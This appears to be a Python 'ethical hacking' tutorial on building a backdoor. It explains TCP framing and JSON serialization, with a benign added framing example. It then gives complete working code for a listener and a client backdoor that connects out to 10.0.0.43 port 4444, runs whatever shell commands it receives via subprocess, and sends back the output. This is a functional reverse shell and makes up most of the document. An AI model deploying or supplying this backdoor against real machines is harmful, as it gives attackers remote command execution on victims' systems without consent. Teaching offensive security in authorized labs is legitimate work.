Python Ethical Hacking - BACKDOORS(3)
BACKDOORS Sockets
Problem:
- TCP is stream-based.
- Difficult to identify the end of message/batch.
Solution:
- Make sure the message is well defined.
- Implement a protocol that the send and receive methods conform to.
- Send the size of the message as a header.
- Append an end-of-message mark to the end of each message.
- Serialize the message.
BACKDOORS Serialization
Benefits:
- The message is well defined; the receiver knows if a message is incomplete.
- Can be used to transfer objects (lists, dicts, etc.).
Implementation:
- JSON and Pickle are common solutions.
- JSON (JavaScript Object Notation) is implemented in many programming languages.
- Represents objects as text.
- Widely used when transferring data between clients and servers.
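An added example (not part of the original notes) of the "send the size of the message as a header" option combined with JSON serialization, run over a local socket pair with constructed messages. The 4-byte header format, the 1 MiB cap and the function names are assumptions chosen for illustration.

```python
import json
import socket
import struct

HEADER = struct.Struct("!I")   # assumed format: 4-byte big-endian body length
MAX_MESSAGE = 1 << 20          # assumed 1 MiB cap so a peer cannot force unbounded buffering


def send_msg(sock, obj):
    """Serialize obj as JSON and send it behind a length header."""
    # JSON, not pickle: unpickling bytes from an untrusted peer can execute code.
    body = json.dumps(obj).encode("utf-8")
    if len(body) > MAX_MESSAGE:
        raise ValueError("message too large")
    sock.sendall(HEADER.pack(len(body)) + body)  # send() may write only part


def recv_exact(sock, n):
    """Read exactly n bytes; recv() may return fewer than requested."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-message")
        buf += chunk
    return bytes(buf)


def recv_msg(sock):
    """Read one length-prefixed JSON message and return the decoded object."""
    (size,) = HEADER.unpack(recv_exact(sock, HEADER.size))
    if size > MAX_MESSAGE:
        raise ValueError("declared size exceeds limit")
    return json.loads(recv_exact(sock, size).decode("utf-8"))


def demo():
    """Constructed input: two messages back to back, the second split across writes."""
    a, b = socket.socketpair()
    try:
        send_msg(a, {"id": 1, "items": ["x", "y"]})
        second = json.dumps("hello " * 500).encode("utf-8")
        frame = HEADER.pack(len(second)) + second
        a.sendall(frame[:7])   # header plus part of the body
        a.sendall(frame[7:])   # remainder arrives separately
        return [recv_msg(b), recv_msg(b)]
    finally:
        a.close()
        b.close()
```

A length header still delimits messages when two of them arrive in the same recv() call, a case where retrying json.loads on a growing buffer keeps raising ValueError ("Extra data") and never returns.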
Server Side - Listener Code:
#!/usr/bin/env python
import socket
import json


class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connections")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        # Serialize the object to JSON text before sending
        json_data = json.dumps(data).encode()
        self.connection.send(json_data)

    def reliable_receive(self):
        # Keep appending received chunks until the buffer parses as JSON
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024).decode()
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command.decode())
        return self.reliable_receive()

    def run(self):
        while True:
            command = input(">> ").encode()
            result = self.execute_remotely(command)
            print(result)


my_listener = Listener("10.0.0.43", 4444)
my_listener.run()
Client Side - Backdoor code:
#!/usr/bin/env python
import json
import socket
import subprocess


class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        # Serialize the object to JSON text before sending
        json_data = json.dumps(data).encode()
        self.connection.send(json_data)

    def reliable_receive(self):
        # Keep appending received chunks until the buffer parses as JSON
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024).decode()
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            command = self.reliable_receive()
            command_result = self.execute_system_command(command)
            self.reliable_send(command_result.decode())
        self.connection.close()


my_backdoor = Backdoor("10.0.0.43", 4444)
my_backdoor.run()